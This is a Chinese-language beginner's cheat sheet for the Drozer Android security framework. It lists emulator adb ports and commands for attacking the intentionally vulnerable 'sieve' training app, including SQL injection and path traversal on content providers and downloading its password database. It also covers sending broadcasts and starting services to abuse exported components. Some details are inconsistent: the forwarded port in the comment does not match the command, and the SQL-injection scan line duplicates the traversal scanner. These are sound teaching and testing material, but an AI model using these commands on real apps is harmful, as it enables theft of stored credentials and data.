Drozer 入门

模拟器名称	连接默认端口
夜神安卓模拟器	62001
逍遥安卓模拟器	21503
BlueStacks(蓝叠安卓模拟器)	5555
雷电安卓模拟器	5555
天天安卓模拟器	6555
网易MuMu(安卓模拟器)	7555
安卓模拟器大师	54001

查看连接连接状态

1	adb devices

进入安卓 shell

adb shell

端口转发

把安卓的41415端口转发到本机的41415端口

1	adb forward tcp:31415 tcp:31415

连接 Drozer

1	drozer console connect

Drozer 测试步骤

获取包名

-f 后面跟 apk 的名字，这里以 sieve.apk 为例子

1	run app.package.list -f sieve

获取包的基本信息

1	run app.package.info -a com.mwr.example.sieve

确定攻击面

1	run app.package.attacksurface com.mwr.example.sieve

Acitivity

获取 Activity 信息

1	run app.activity.info -a com.mwr.example.sieve

启动 activity

1	run app.activity.start --component com.mwr.example.sieve 活动名称

Content Provider

获取 Content Provider 信息

1	run app.provider.info -a com.mwr.example.sieve

检测目录遍历漏洞

1	run scanner.provider.traversal -a com.mwr.example.sieve

检测 SQL 注入漏洞

1	run scanner.provider.traversal -a com.mwr.example.sieve

目录遍历漏洞

爆破 uri

1	run scanner.provider.finduris -a com.mwr.example.sieve

查询 uri

1	run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

SQL 注入漏洞

1	run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

系统文件访问

1	run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

系统文件下载

1	run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data /data/com.mwr.example.sieve/databases/database.db /home/user/database.db

Broadcast

获取 Broadacast 信息

1	run app.broadcast.info -a com.icenta.sudoku.ui

空 action 攻击

1	run app.broadcast.send --component com.icenta.sudoku.ui com.heyzap.sdk.ads.PackageAddedReceiver

空 extras 攻击

这里的 action 需要查看反编译的 AndroidManifest.xml 文件，找出 receiver 对应的 action

1	run app.broadcast.send --action android.intent.action.PACKAGE_ADDED

Service

获取 Service 信息

1	run app.service.info -a com.mwr.example.sieve

权限提升（未试验）

1	run app.service.start --action com.test.vulnerability.SEND_SMS --extra string dest 1 --extra string text 1 --extra string OP SEND_SMS